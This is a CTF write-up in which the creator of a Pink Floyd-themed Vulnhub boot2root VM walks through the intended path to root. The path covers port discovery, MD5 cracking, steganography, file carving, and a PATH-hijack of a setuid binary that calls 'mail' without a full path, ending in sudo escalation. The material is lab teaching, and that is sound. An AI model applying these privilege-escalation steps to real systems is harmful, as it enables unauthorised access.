Set the Controls for the Heart of the Sun
Recently I created my first boot2root challenge, The Wall for the Vulnhub community. I hope everyone enjoys the challenge, and here’s my writeup of the intended path to root.
“In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.
You challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!”
Before we begin.. we had better get some Floyd tunes rocking. My choice of album today is Pink Floyd’s sixth studio album; Meddle (1971). With the music sorted, let’s leave The Dark Side of the Moon and Set the Controls for the Heart of the Sun!
Just like all boot2root CTF challenges, we need to find our victim machine:
|
1 2 3 4 5 |
root@omerta:~# arp -an ? (192.168.240.158) at <incomplete> on eth0 ? (192.168.240.2) at 00:50:56:f4:ee:26 [ether] on eth0 ? (192.168.240.157) at 00:0c:29:1c:22:ef [ether] on eth0 ? (192.168.240.254) at 00:50:56:ec:12:d7 [ether] on eth0 |
There it is (192.168.240.157) at 00:0c:29:1c:22:ef; just Another Brick in the Wall.
Time for some nmap Pink Floyd Discovery:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
root@omerta:~# nmap -sT -Pn -n -A -v -p- 192.168.240.157 Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-06 11:53 AEST NSE: Loaded 132 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 11:53 Completed NSE at 11:53, 0.00s elapsed Initiating NSE at 11:53 Completed NSE at 11:53, 0.00s elapsed Initiating ARP Ping Scan at 11:53 Scanning 192.168.240.157 [1 port] Completed ARP Ping Scan at 11:53, 0.10s elapsed (1 total hosts) Initiating Connect Scan at 11:53 Scanning 192.168.240.157 [65535 ports] Connect Scan Timing: About 2.25% done; ETC: 12:16 (0:22:26 remaining) Connect Scan Timing: About 5.20% done; ETC: 12:16 (0:21:15 remaining) ---snip--- All 65535 scanned ports on 192.168.240.157 are filtered MAC Address: 00:0C:29:1C:22:EF (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop ---snip--- |
All 65535 ports are filtered? No Echoes to ICMP probes? Interesting… It looks as though The Wall is actually some sort of firewall!
Let’s see if we can find any hints in the network traffic:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
root@omerta:~# tcpdump host 192.168.240.157 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 12:21:23.496106 IP 192.168.240.157.4295 > 192.168.240.2.1337: Flags [S], seq 3807235731, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 726845931 ecr 0], length 0 12:21:23.496118 IP 192.168.240.2.1337 > 192.168.240.157.4295: Flags [R.], seq 0, ack 3807235732, win 32767, length 0 12:21:23.502933 ARP, Request who-has 192.168.240.3 tell 192.168.240.157, length 46 12:21:23.509897 ARP, Request who-has 192.168.240.4 tell 192.168.240.157, length 46 12:21:23.516766 ARP, Request who-has 192.168.240.5 tell 192.168.240.157, length 46 12:21:23.523689 ARP, Request who-has 192.168.240.6 tell 192.168.240.157, length 46 12:21:23.530565 ARP, Request who-has 192.168.240.7 tell 192.168.240.157, length 46 12:21:23.537400 ARP, Request who-has 192.168.240.8 tell 192.168.240.157, length 46 12:21:23.544263 ARP, Request who-has 192.168.240.9 tell 192.168.240.157, length 46 12:21:23.551053 ARP, Request who-has 192.168.240.10 tell 192.168.240.157, length 46 12:21:23.557836 ARP, Request who-has 192.168.240.11 tell 192.168.240.157, length 46 12:21:23.564696 ARP, Request who-has 192.168.240.12 tell 192.168.240.157, length 46 ---snip--- |
Okay then… there is lots of broadcast traffic coming from The Wall. Let’s filter that out:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
root@omerta:~# tcpdump host 192.168.240.157 and not arp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 12:23:01.982737 IP 192.168.240.157.20404 > 192.168.240.254.1337: Flags [S], seq 1651764410, win 16384, options [mss 460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3087165336 ecr 0], length 0 12:23:12.069720 IP 192.168.240.157.47863 > 192.168.240.1.1337: Flags [S], seq 1251225734, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1072158578 ecr 0], length 0 12:23:12.069734 IP 192.168.240.1.1337 > 192.168.240.157.47863: Flags [R.], seq 0, ack 1251225735, win 0, length 0 12:23:12.076738 IP 192.168.240.157.22134 > 192.168.240.2.1337: Flags [S], seq 412790070, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 745172507 ecr 0], length 0 12:23:12.076742 IP 192.168.240.2.1337 > 192.168.240.157.22134: Flags [R.], seq 0, ack 412790071, win 32767, length 0 12:23:13.355486 IP 192.168.240.157.19559 > omerta.1337: Flags [S], seq 4001087718, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 2057626273 ecr 0], length 0 12:23:13.355516 IP omerta.1337 > 192.168.240.157.19559: Flags [R.], seq 0, ack 4001087719, win 0, length 0 12:23:14.369038 IP 192.168.240.157.24465 > 192.168.240.254.1337: Flags [S], seq 3544915988, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1150007767 ecr 0], length 0 12:23:23.466803 IP 192.168.240.157.4199 > 192.168.240.2.1337: Flags [S], seq 882354251, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 767958101 ecr 0], length 0 12:23:23.466813 IP 192.168.240.2.1337 > 192.168.240.157.4199: Flags [R.], seq 0, ack 882354252, win 32767, length 0 |
It looks like The Wall is trying to connect to any host on the subnet listening on port 1337. Time to set up a listener for port 1337.
Just like Money, “it’s a hit”!
“… don’t be surprised when a crack in the ice appears under your feet”. Interesting.. a hint perhaps? Like all good challenges, enumeration is always the key. Port scanning the host again reveals port 80/tcp is now open. Now we are getting somewhere… let’s take a look. Browsing to port 80 presents us with a great photograph of all original band members:
Let’s look a little harder:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
root@omerta:~# curl -i -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" 192.168.240.157 HTTP/1.1 200 OK Connection: keep-alive Content-Length: 539 Content-Type: text/html Date: Sat, 28 Nov 2015 05:56:18 GMT Last-Modified: Sat, 24 Oct 2015 15:20:23 GMT Server: OpenBSD httpd <html> <body bgcolor="#000000"> <center><img src="pink_floyd.jpg"</img></center> </body> </html> <!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork. 737465673d3333313135373330646262623337306663626539373230666536333265633035--> |
Some interesting comments there. First off, let’s decode that hex:
|
1 2 3 |
root@omerta:~# echo 737465673d3333313135373330646262623337306663626539373230666536333265633035 | xxd -r -p steg=33115730dbbb370fcbe9720fe632ec05 |
Decoding the hex reveals another secret; is it encoding or a hash? Looks like an MD5 hash to me, but let’s double check:
|
1 2 3 4 5 6 |
root@omerta:~# hash-identifier ---snip--- HASH: 33115730dbbb370fcbe9720fe632ec05 Possible Hashs: [+] MD5 |
Time to decrypt the hash:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
root@omerta:~# hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt This copy of hashcat will expire on 01.01.2016. Please upgrade to continue using hashcat. Initializing hashcat v0.49 with 4 threads and 32mb segment-size... Added hashes from file hash.txt: 1 (1 salts) Activating quick-digest mode for single-hash NOTE: press enter for status-screen 33115730dbbb370fcbe9720fe632ec05:divisionbell All hashes have been recovered Input.Mode: Dict (/usr/share/wordlists/rockyou.txt) Index.....: 1/5 (segment), 3627099 (words), 33550339 (bytes) Recovered.: 1/1 hashes, 1/1 salts Speed/sec.: - plains, - words Progress..: 1835616/3627099 (50.61%) Running...: --:--:--:-- Estimated.: --:--:--:-- Started: Sun Dec 6 12:53:57 2015 Stopped: Sun Dec 6 12:53:57 2015 |
33115730dbbb370fcbe9720fe632ec05:divisionbell. Too easy… so now we have steg=divisionbell, but what can we do with that? Let’s look at the comments in the webpage again. “The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork.”
Okay.. so we are looking at Steganography here. If you want to know more about the Publius Enigma mystery, take a look here. Onwards and upwards.. it’s Steghide time!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
root@omerta:~# steghide extract -sf Desktop/floyd/pink_floyd.jpg Enter passphrase: wrote extracted data to "pink_floyd_syd.txt". root@omerta:~# root@omerta:~# root@omerta:~# cat pink_floyd_syd.txt Hey Syd, I hear you're full of dust and guitars? If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0 Roger Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in his collection. |
More decoding/decrypting! Base64 decoding first:
|
1 2 |
root@omerta:~# echo U3lkQmFycmV0dA== | base64 -d;echo SydBarrett |
Running the hash through hash-identifier reveals it’s also an MD5 hash. Let’s decrypt it:
|
1 2 3 4 |
root@omerta:~# hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt ---snip--- f831605ae34c2399d1e5bb3a4ab245d0:pinkfloydrocks ---snip--- |
“SydBarrett” and “pinkfloydrocks”. Sounds like a username and password to me?
After some time fuzzing the web application and pottering around looking for clues, I take another look at the text file which was hidden in the pinkfloyd jpg. “Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.”
1965? Surely not another port opening on the firewall?
|
1 2 3 4 5 6 7 8 9 10 11 |
root@omerta:~# nmap -Pn -n -sT -A -p 1965 192.168.240.157 Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-06 13:10 AEST Nmap scan report for 192.168.240.157 Host is up (0.00057s latency). PORT STATE SERVICE VERSION 1965/tcp open ssh OpenSSH 7.0 (protocol 2.0) | ssh-hostkey: | 2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA) |_ 256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA) ---snip--- |
Yep… port 1965/tcp is open, and it’s an SSH port. Nice!
|
1 2 3 4 5 6 7 8 9 |
root@omerta:~# ssh -p 1965 SydBarrett@192.168.240.157 The authenticity of host '[192.168.240.157]:1965 ([192.168.240.157]:1965)' can't be established. ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[192.168.240.157]:1965' (ECDSA) to the list of known hosts. SydBarrett@192.168.240.157's password: Could not chdir to home directory /home/SydBarrett: No such file or directory This service allows sftp connections only. Connection to 192.168.240.157 closed. |
So it looks like we have the correct username and password combination, however we cannot simply SSH, we must sftp.
|
1 2 3 4 5 6 7 8 9 10 |
root@omerta:~# sftp -P 1965 SydBarrett@192.168.240.157 SydBarrett@192.168.240.157's password: Connected to 192.168.240.157. sftp> ls -al drwxr-x--- 3 0 1000 512 Nov 28 06:33 . drwxr-x--- 3 0 1000 512 Oct 24 20:16 .. drwxr-xr-x 3 0 1000 512 Oct 24 18:17 .mail -rw-r--r-- 1 0 1000 1912 Oct 25 22:56 bio.txt -rw-r--r-- 1 0 1000 868967 Oct 24 16:17 syd_barrett_profile_pic.jpg sftp> |
Pottering around the sftp directory, I grab the following loot:
bio.txt
syd_barrett_profile_pic.jpg
.mail/sent-items
.mail/.stash/eclipsed_by_the_moon
The bio.txt file had exactly what you would expect… Syd’s biography. Apart from that there doesn’t seem to be any hints or other useful information.
Next.. the profile pic:
What a legend! .. but no real hint that I can see. Running exiftool and strings on the image doesn’t give us any clues either.
Next.. the sent-items:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
root@omerta:~# cat sent-items Date: Sun, 24 Oct 1965 18:45:21 +0200 From: Syd Barrett <syd@pink.floyd> Reply-To: Syd Barret <syd@pink.floyd> To: Roger Waters <roger@pink.floyd> Subject: Had to hide the stash Roger... I had to hide the stash. Usual deal.. just use the scalpel when you find it. Ok, sorry for that. Rock on man "Syd" |
This looks promising. Reference to the stash (.stash) and to use the scalpel when we find the stash. Let’s take a look at the eclipsed_by_the_moon file we grabbed from the stash:
|
1 2 |
root@omerta:~# file eclipsed_by_the_moon eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 10:15:47 2015, from Unix |
A compressed gzip. Uncompressing the file gives us another file, eclipsed_by_the_moon.lsd
|
1 2 |
root@omerta:~# file eclipsed_by_the_moon.lsd eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit) |
Looks like a partition of some sort. Mounting the partition and taking a closer look gives us nothing to work with? “Usual deal.. just use the scalpel when you find it.”. Sounds like it could be forensics to me.. let’s take a closer look with scalpel:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
root@omerta:~# scalpel -c /etc/scalpel/scalpel.conf eclipsed_by_the_moon.lsd Scalpel version 1.60 Written by Golden G. Richard III, based on Foremost 0.69. Opening target "/root/eclipsed_by_the_moon.lsd" Image file pass 1/2. eclipsed_by_the_moon.lsd: 100.0% |*******************************************************************************************************************************************************| 47.0 MB 00:00 ETAAllocating work queues... Work queues allocation complete. Building carve lists... Carve lists built. Workload: jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files Carving files from image. Image file pass 2/2. eclipsed_by_the_moon.lsd: 100.0% |*******************************************************************************************************************************************************| 47.0 MB 00:00 ETAProcessing of image file complete. Cleaning up... Done. Scalpel is done, files carved = 1, elapsed = 1 seconds. |
jpg file carved out hey?… let’s take a look:
It’s Roger Waters.. and he’s kind enough to give us a password.
Quick detour here just for you info. There are plenty of other tools (foremost, autopsy, etc) to do this type of forensics work, but here’s another way you could have carved out the jpg:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
root@omerta:~# binwalk eclipsed_by_the_moon.lsd DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 214016 0x34400 JPEG image data, JFIF standard 1.01 ---snip--- root@omerta:~# binwalk --dd jpeg:jpg:2 eclipsed_by_the_moon.lsd DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 214016 0x34400 JPEG image data, JFIF standard 1.01 ---snip--- root@omerta:~# file _eclipsed_by_the_moon.lsd.extracted/34400.jpg _eclipsed_by_the_moon.lsd.extracted/34400.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 604x388, frames 3 |
Moving onwards there’s only one thing to do; try logging on as Roger:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
root@omerta:~# ssh -p 1965 RogerWaters@192.168.240.157 RogerWaters@192.168.240.157's password: Last login: Sat Nov 28 04:29:53 2015 from 192.168.240.153 OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015 .u!"` .x*"` ..+"NP .z"" ? M#` 9 , , 9 M d! ,8P' R X.:x' R' , F F' M R.d' d P @ E` , ss P ' P N.d' x '' ' X x . 9 .f ! . $b 4; $k / dH $f 'X ;$$ z . MR :$ R M$$, : d9b M' tM M: #'$L ;' M `8 X MR `$;t' $F # X ,oR t Q; $$@ R$ H :RP' $b X @' 9$E @Bd' $' ?X ; W `M' `$M d$ `E ;.o* :R .. ` ' "' ' @' '$o*"' $ |
Once again… we have a bio.txt….. No lead there.
There’s a secret-diary, but no real lead there either.
Let’s take a look at the profile image:
Nothing obvious here, and no results with strings or exiftool. Taking a look around Roger’s home directory doesn’t reveal any clues, so let’s start our normal enumeration techniques. Firstly, let’s look for setuid binaries:
|
1 2 3 4 5 6 7 |
$ find / -perm -6000 -maxdepth 6 -exec ls -ld {} \; 2>/dev/null -r-sr-sr-x 1 root daemon 30560 Aug 16 18:26 /usr/bin/lpr -r-sr-sr-x 1 root daemon 26428 Aug 16 18:26 /usr/bin/lprm -rws--s--x 1 NickMason NickMason 7291 Aug 8 00:33 /usr/local/bin/brick -rwsr-s--- 1 DavidGilmour RichardWright 7524 Oct 25 07:58 /usr/local/bin/shineon -r-sr-sr-x 2 root authpf 22292 Aug 16 18:26 /usr/sbin/authpf -r-sr-sr-x 2 root authpf 22292 Aug 16 18:26 /usr/sbin/authpf-noip |
The brick binary is world executable, so let’s take a look:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ /usr/local/bin/brick What have we here, laddie? Mysterious scribbings? A secret code? Oh, poems, no less! Poems everybody! Who is the only band member to be featured on every Pink Floyd album? : Nick Mason /bin/sh: Cannot determine current working directory $ whoami NickMason |
Nice! Just like that we have pivoted to the NickMason account. We head to Nick’s home directory, and again we find a bio text and a profile pic. Let’s take a look at the bio.txt file first:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
$ cat bio.txt "Nicholas Berkeley "Nick" Mason (born 27 January 1944) is an English musician and composer, best known as the drummer of Pink Floyd. He is the only constant member of the band since its formation in 1965. Despite solely writing only a few Pink Floyd songs, Mason has co-written some of Pink Floyd's most popular compositions such as "Echoes" and "Time". Mason is the only Pink Floyd member to be featured on every one of their albums. It is estimated that as of 2010, the group have sold over 250 million records worldwide,[1][2] including 75 million units sold in the United States. He competes in auto racing events, such as the 24 Hours of Le Mans. On 26 November 2012, Mason received an Honorary Doctor of Letters from the University of Westminster at the presentation ceremony of the School of Architecture and Built Environment (he had studied architecture at the University's predecessor, Regent Street Polytechnic, 1962-1967)." I wander if anyone is reading these bio's? Richard Wright.. if you're reading this, I'm not really going to cut you into little pieces. I was just having a joke. Anyhow, I have now added you to thewall. You're username is obvious. You'll find your password in my profile pic. Source: Wikipedia (https://en.wikipedia.org/wiki/Nick_Mason) |
I’m glad I read Nick’s bio. The last paragraph says it all… “You’ll find your password in my profile pic.”. After transferring the file, it doesn’t take long to realise that this is not actually a jpg file.. it’s an Ogg file:
|
1 2 |
root@omerta:~# file nick_mason_profile_pic.jpg nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I |
There is no actual profile picture for Nick on The Wall, so here’s one I quickly grabbed from google :)
Listening to the audio we can very quickly hear morse code embedded within the piano music. Let’s use Sonic Visualiser to see if we can pick the morse in the spectrogram. Layer > Add Spectrogram > All Channels Mixed:
Jotting down the morse gives us the following:
.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-
Decoding this results in the following ascii string:
richardwright1943farfisa
SSH’ing into The Wall as Richard Wright doesn’t seem to work, and quite frankly trying richardwright1943farfisa, 1943farfisa, and a number of other permeations of the password only resulting in me getting closer to Brain Damage. And then I had a light bulb moment.. what if Richard isn’t allowed to SSH into the box?
|
1 2 3 4 5 6 7 8 9 10 |
$ cat /etc/ssh/sshd_config Port 1965 AllowUsers SydBarrett RogerWaters #LoginGraceTime 2m PermitRootLogin prohibit-password #StrictModes yes #MaxAuthTries 6 #MaxSessions 10 ---snip--- |
And there it is. Only Syd and Roger are able to SSH in to The Wall.
|
1 2 3 4 5 |
$ login login: RichardWright Password: $ whoami RichardWright |
How frustrating! It’s ok… Breathe, “breath in the air”.
Once again we have a bio.txt file, and a profile picture. The bio.txt doesn’t seem to have any hints or data. Let’s take a look at the profile pic:
Nothing obvious in the profile picture either. Let’s take a look at Richard’s mailbox, as the file size indicates there may be some email:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
$ cat mbox From DavidGilmour@thewall.localdomain Tue Oct 27 01:41:18 2015 Return-Path: DavidGilmour@thewall.localdomain Delivered-To: RichardWright@thewall.localdomain Received: from localhost (thewall.localdomain [local]) by thewall.localdomain (OpenSMTPD) with ESMTPA id 3ad74b19 for <RichardWright@thewall.localdomain>; Tue, 27 Oct 2015 01:41:18 +1000 (AEST) From: David Gilmour <DavidGilmour@thewall.localdomain> Date: Tue, 27 Oct 2015 02:41:18 +1000 (AEST) Message-Id: <9059884549097248741.enqueue@thewall.localdomain> To: RichardWright@thewall.localdomain Subject: Re: Brain Damage Status: RO G'day Rick.. how's the ivory tickling going? There's plenty of bricks in the wall, so I'll give you a few when we catch up. For now, just use that command I gave you with the menu. Dave ---------- Hey Dave, I feel like we're back in the studio for The Dark Side of the Moon. Sorry to keep bugging you, but can you tell me again how to do things when I'm on thewall. Rick |
Good stuff! An email conversation between Richard Wright and David Gilmour. It looks like Richard is having some dramas remembering linux commands, so David has kindly created Richard a binary. Nice. Do you remember from our previous search for setuid binaries, we found one called brick? Did you also notice, there was also one called shineon? If not, you were probably just having A Momentary Lapse of Reason. Let’s take a look:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
$ /usr/local/bin/shineon Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 1 November 2015 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 Time - The Dark Side of the Moon Press ENTER to continue. Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 2 Echoes - Meddle RogerWaters ttyp0 Nov 28 19:05 (192.168.240.153) Press ENTER to continue. Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 3 Is There Anybody Out There? - The Wall PING www.google.com (59.167.145.249): 56 data bytes 64 bytes from 59.167.145.249: icmp_seq=0 ttl=128 time=36.489 ms 64 bytes from 59.167.145.249: icmp_seq=1 ttl=128 time=36.792 ms 64 bytes from 59.167.145.249: icmp_seq=2 ttl=128 time=36.847 ms --- www.google.com ping statistics --- 3 packets transmitted, 3 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 36.489/36.709/36.847/0.221 ms Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 4 Keep Talking- The Division Bell No mail for RichardWright Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 5 Quitting program! |
A simple menu for common tasks it would seem. Running through each option doesn’t show anything strange. Let’s take a look with strings:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
$ strings /usr/local/bin/shineon /usr/libexec/ld.so OpenBSD OpenBSD libc.so.80.1 printf __stack_smash_handler __srget getc puts system _thread_atfork environ __progname __cxa_atexit __sF __isthreaded scanf _Jv_RegisterClasses __got_start __got_end __data_start _edata __bss_start __progname_storage __fini __init_tcb QRP1 [^_] Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit Quitting program! Invalid choice! load_menu Time - The Dark Side of the Moon /usr/bin/cal Press ENTER to continue. Echoes - Meddle /usr/bin/who Is There Anybody Out There? - The Wall /sbin/ping -c 3 www.google.com Keep Talking- The Division Bell mail |
A simple C program, with one very insecure way of calling a binary. mail is called without the full path. There’s our way forward:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
$ ln -s /bin/sh mail $ export PATH=.:$PATH $ /usr/local/bin/shineon Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 4 Keep Talking- The Division Bell $ whoami DavidGilmour $ id uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright) |
Success… almost. Looks like we are almost DavidGilmour, but not quite. Let’s take a look around David’s home directory and see what we can find. First up, another bio.. did you really expect anything less? No real hints in the file. Let’s take a look at the profile pic:
Nothing obvious looking at the photo. Let’s look a little closer:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
$ strings david_gilmour_profile_pic.jpg JFIF Ducky zhttp://ns.adobe.com/xap/1.0/ <?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.352624, 2008/07/30-18:05:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:Iptc4xmpCore="http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/" ---snip--- 7OnN} Nn_} ^=>W {w|6 Om?OoA who_are_you_and_who_am_i |
Gotcha! Let’s presume that this is David’s password and actually login as David:
|
1 2 3 4 5 6 |
$ login login: DavidGilmour Password: $ whoami;id DavidGilmour uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine) |
Wish You Were Here don’t you? ;) Let’s keep moving on.. we have to be getting close now. In David’s home directory is a file call anotherbrick.txt:
|
1 2 3 4 5 6 |
$ cat anotherbrick.txt # Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond New website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php # You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs |
A new website… good stuff! Only one thing to do.. browse away:
Taking a look at the site doesn’t reveal any obvious hints. Let’s take a look at the source prior to proxying with burp:
|
1 2 3 4 5 6 7 8 9 |
root@omerta:~# curl -i -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" http://192.168.240.157/pinkfloyd1965newblogsite50yearscelebration-temp/index.php HTTP/1.1 200 OK Connection: keep-alive Content-type: text/html; charset=UTF-8 Date: Sat, 28 Nov 2015 09:40:42 GMT Server: OpenBSD httpd Transfer-Encoding: chunked X-Powered-By: PHP/5.6.11 ---snip--- |
“Can you see what the Dog sees?” Let’s grab the front page image and take a closer look:
We can barely make out some sort of text where the dog is looking. Fire up gimp and let’s take a better look with ”
hints of lightness”:
By adjusting the brightness and contrast, we can make out two strings:
/welcometothemachine
50696e6b466c6f796435305965617273
Looks like another MD5? Passing this through hashcat, and also checking with MD5 Online doesn’t come up with any result? Taking a closer look, it’s possible it could be hex based on the numerals and alpha characters.
|
1 2 |
root@omerta:~# echo 50696e6b466c6f796435305965617273 | xxd -r -p;echo PinkFloyd50Years |
“Come on, you target for far away laughter” .. that was just a bit cruel. Let’s see what /welcometothemachine is:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
$ find / -name "welcometothemachine" 2>/dev/null /var/www/htdocs/welcometothemachine $ cd /var/www/htdocs/welcometothemachine/ $ ls -al total 24 drwxr-xr-x 2 root welcometothemachine 512 Aug 8 00:33 . drwxr-x--- 4 www welcometothemachine 512 Nov 27 01:47 .. -rws--s--- 1 root welcometothemachine 7513 Nov 27 01:47 PinkFloyd $ file PinkFloyd PinkFloyd: writable, executable, regular file, no read permission |
Let’s execute it:
|
1 2 3 4 5 6 |
$ ./PinkFloyd Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces Answer: AAAA Denied.... If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh |
Due to the permissions on the file we are unable to strings the binary, or even scp/transfer it to our attacking machine for further analysis. Let’s try the password we found:
|
1 2 3 4 5 6 |
$ ./PinkFloyd Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces Answer: PinkFloyd50Years Denied.... If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh |
No good. After a little bit of stuffing around, I decided to try the actual hex string:
|
1 2 3 4 5 6 7 8 |
$ ./PinkFloyd Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces Answer: 50696e6b466c6f796435305965617273 Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless Congratulations... permission has been granted. You can now set your controls to the heart of the sun! |
W00t!!!! It doesn’t look like anything has changed in the command prompt, so let’s check if any files have been altered after inputting the correct string:
|
1 2 3 4 |
$ find / -mmin -10 -type f 2>/dev/null /home/DavidGilmour/.ssh/known_hosts /etc/sudoers ---snip--- |
Ha! Sudoers. “Without a thought of the consequence, I gave into my decadence.”
|
1 2 3 4 5 6 7 8 9 10 11 12 |
$ sudo -l Password: Matching Defaults entries for DavidGilmour on thewall: env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK" User DavidGilmour may run the following commands on thewall: (ALL) SETENV: ALL bash-4.3# whoami;id;uname -a root uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) OpenBSD thewall.localdomain 5.8 GENERIC#1066 i386 |
